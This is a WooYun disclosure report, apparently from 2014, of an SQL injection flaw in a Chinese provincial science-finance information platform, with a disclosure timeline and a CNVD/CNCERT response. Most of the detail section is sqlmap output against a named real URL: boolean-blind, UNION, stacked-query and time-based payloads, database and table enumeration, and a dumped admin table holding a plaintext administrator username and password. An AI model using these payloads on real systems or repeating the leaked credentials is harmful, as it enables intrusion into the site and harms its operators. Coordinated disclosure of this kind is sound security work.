漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-059471
漏洞标题:某省科技金融信息服务平台SQL注射
相关厂商:某省科技金融信息服务平台
漏洞作者: 路人甲
提交时间:2014-05-05 15:41
修复时间:2014-06-19 15:41
公开时间:2014-06-19 15:41
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-05: 细节已通知厂商并且等待厂商处理中
2014-05-09: 厂商已经确认,细节仅向厂商公开
2014-05-19: 细节向核心白帽子及相关领域专家公开
2014-05-29: 细节向普通白帽子公开
2014-06-08: 细节向实习白帽子公开
2014-06-19: 细节向公众公开
简要描述:
某省科技金融信息服务平台SQL注射
详细说明:
注射点:http://www.sstf.org.cn/show_news.asp?idx=672&act=4
Place: GET
Parameter: idx
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idx=672 AND 9900=9900&act=4
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: idx=-7152 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(103)+CHAR(110)+CHAR(99)+CHAR(113)+CHAR(106)+CHAR(88)+CHAR(68)+CHAR(120)+CHAR(80)+CHAR(104)+CHAR(65)+CHAR(77)+CHAR(82)+CHAR(84)+CHAR(113)+CHAR(119)+CHAR(103)+CHAR(119)+CHAR(113),NULL,NULL,NULL-- &act=4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: idx=672; WAITFOR DELAY '0:0:5'--&act=4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: idx=672 WAITFOR DELAY '0:0:5'--&act=4
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
Database: kjjr
[129 tables]
+---------------------------------------------------+
| D99_Tmp |
| N5001 |
| N5002_2 |
| N5002_2 |
| N5003 |
| N50041 |
| N50041 |
| N5310 |
| N5320 |
| N60011 |
| N6100 |
| N6200_1 |
| N6200_1 |
| N6300_1 |
| N6300_1 |
| N6400_1 |
| N6400_1 |
| N7002 |
| N7003 |
| N7004 |
| N7005 |
| N7006 |
| N8000_bf |
| N8000_bf |
| N9001 |
| N91001 |
| N91001 |
| N9200 |
| N_5003$ |
Database: kjjr
Table: admin_user
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| id | int |
| uid | varchar |
| upw | varchar |
+--------+---------+
Database: kjjr
Table: admin_user
[1 entry]
+-------+-------+
| uid | upw |
+-------+-------+
| jstpe | jstpe |
+-------+-------+
漏洞证明:
见上
修复方案:
Null
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-05-09 23:44
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心处置。按信息泄露和运行风险评分,rank 14
最新状态:
暂无